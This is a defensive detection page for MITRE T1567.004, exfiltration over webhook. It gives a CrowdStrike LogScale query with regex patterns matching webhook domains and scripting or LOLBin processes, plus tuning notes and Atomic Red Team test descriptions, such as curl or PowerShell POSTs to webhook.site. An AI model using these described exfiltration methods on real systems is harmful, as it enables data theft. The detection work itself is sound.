Detect Exfiltration Over Webhook in CrowdStrike LogScale
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack, Microsoft Teams, and generic services like webhook.site. Adversaries exploit these endpoints by either linking an adversary-controlled webhook to a victim-owned SaaS service for automated repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL via scripting tools. Because webhook traffic is HTTPS and destined for widely-trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks for credential and token exfiltration from malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused via SQL Server xp_cmdshell lateral movement chains.
MITRE ATT&CK
- Tactic
- Exfiltration
- Technique
- T1567 Exfiltration Over Web Service
- Sub-technique
- T1567.004 Exfiltration Over Webhook
- Canonical reference
- https://attack.mitre.org/techniques/T1567/004/
LogScale Detection Query
// Signal 1: Suspicious process DNS resolution or network connection to webhook domains
#event_simpleName IN ("DnsRequest", "NetworkConnectIP4", "NetworkConnectIP6")
| DomainName = /(?i)(discord\.com|discordapp\.com|hooks\.slack\.com|slack\.com|webhook\.site|webhooks\.site|outlook\.office\.com|outlook\.office365\.com|pipedream\.net|requestbin\.com|requestcatcher\.com|hookbin\.com|beeceptor\.com|smee\.io|ntfy\.sh|pushover\.net)/
OR RemoteAddressIP4 = /(?i)(discord|slack|webhook|pipedream|ntfy)/
| ContextBaseFileName = /(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|python3|node\.exe|curl\.exe|wget\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|bitsadmin\.exe|certutil\.exe)$/
| groupBy([ComputerName, UserName, ContextBaseFileName, DomainName], function=[
count(aid, as=ConnectionCount),
min(@timestamp, as=FirstSeen),
max(@timestamp, as=LastSeen)
])
| SignalType := "SuspiciousProcessWebhookDNS"
// Signal 2: Webhook URL pattern in process command line
// Run separately and union:
// #event_simpleName = "ProcessRollup2"
// | CommandLine = /(?i)(discord\.com\/api\/webhooks|hooks\.slack\.com\/services|webhook\.site|outlook\.office\.com\/webhook|outlook\.office365\.com\/webhook|pipedream\.net|requestbin\.com|hookbin\.com|beeceptor\.com|ntfy\.sh|smee\.io)/
// | groupBy([ComputerName, UserName, FileName, CommandLine], function=[
// count(aid, as=EventCount),
// min(@timestamp, as=FirstSeen),
// max(@timestamp, as=LastSeen)
// ])
// | SignalType := "WebhookURLInCommandLine"
// Combined summary view after union:
| groupBy([ComputerName, UserName, ContextBaseFileName, SignalType], function=[
sum(ConnectionCount, as=TotalConnections),
min(FirstSeen, as=EarliestSeen),
max(LastSeen, as=LatestSeen),
collect(DomainName, as=WebhookTargets)
])
| TotalConnections > 0
| sort(TotalConnections, order=desc)CrowdStrike LogScale CQL detecting exfiltration over webhook endpoints using Falcon sensor telemetry. Signal 1 correlates DnsRequest and NetworkConnectIP4/IP6 events where the resolving or connecting process matches known LOLBin/scripting executables and the destination domain matches known webhook services. Signal 2 (commented for union) matches ProcessRollup2 events where the CommandLine field contains webhook URL patterns, covering staged manual POST exfiltration. Results are grouped by host, user, and process to surface high-frequency webhook contacts and identify lateral movement chains involving multiple webhook targets.
Data Sources
Required Tables
False Positives & Tuning
- Build automation agents (Jenkins, GitLab Runner) running under service accounts that use curl or Python to post CI/CD pipeline status notifications to Slack or Teams incoming webhooks.
- Endpoint management or monitoring agents (Ansible, Chef, Puppet) executing scripts that include webhook.site or requestbin.com URLs for HTTP callback testing during configuration management tasks.
- Incident response and threat hunting scripts executed by security analysts that query webhook delivery sites like smee.io or ntfy.sh to receive callback signals from test payloads.
Other platforms for T1567.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Exfiltrate Data via Discord Webhook using PowerShell
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-RestMethod' and 'webhook.site'. Sysmon Event ID 3: Network Connection from powershell.exe to webhook.site on port 443. DeviceNetworkEvents: RemoteUrl containing webhook.site, InitiatingProcessFileName=powershell.exe, BytesSent > 0.
- Test 2Exfiltrate File Contents via curl to Webhook Endpoint
Expected signal: Sysmon Event ID 1: Process Create for cmd.exe (echo/type) and curl.exe with CommandLine containing 'webhook.site' and '-X POST'. Sysmon Event ID 11: File Create for the staging file in %TEMP%. Sysmon Event ID 3: Network Connection from curl.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=curl.exe, RemoteUrl containing webhook.site.
- Test 3Python Requests Library Webhook Exfiltration
Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'urllib.request', 'webhook.site', and 'POST'. Sysmon Event ID 3: Network Connection from python.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=python.exe, RemoteUrl=webhook.site.
- Test 4Automated SaaS Webhook Exfiltration via Microsoft Teams Incoming Webhook
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and 'outlook.office.com/webhook'. Sysmon Event ID 3: Network Connection from powershell.exe to outlook.office.com on port 443. DeviceNetworkEvents: RemoteUrl containing /webhook/, InitiatingProcessFileName=powershell.exe.
References (11)
- https://attack.mitre.org/techniques/T1567/004/
- https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191
- https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord
- https://blog.talosintelligence.com/collab-app-abuse/
- https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md
- https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/
- https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
- https://www.redhat.com/en/topics/automation/what-is-a-webhook
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.004/T1567.004.md
Unlock Pro Content
Get the full detection package for T1567.004 including response playbook, investigation guide, and atomic red team tests.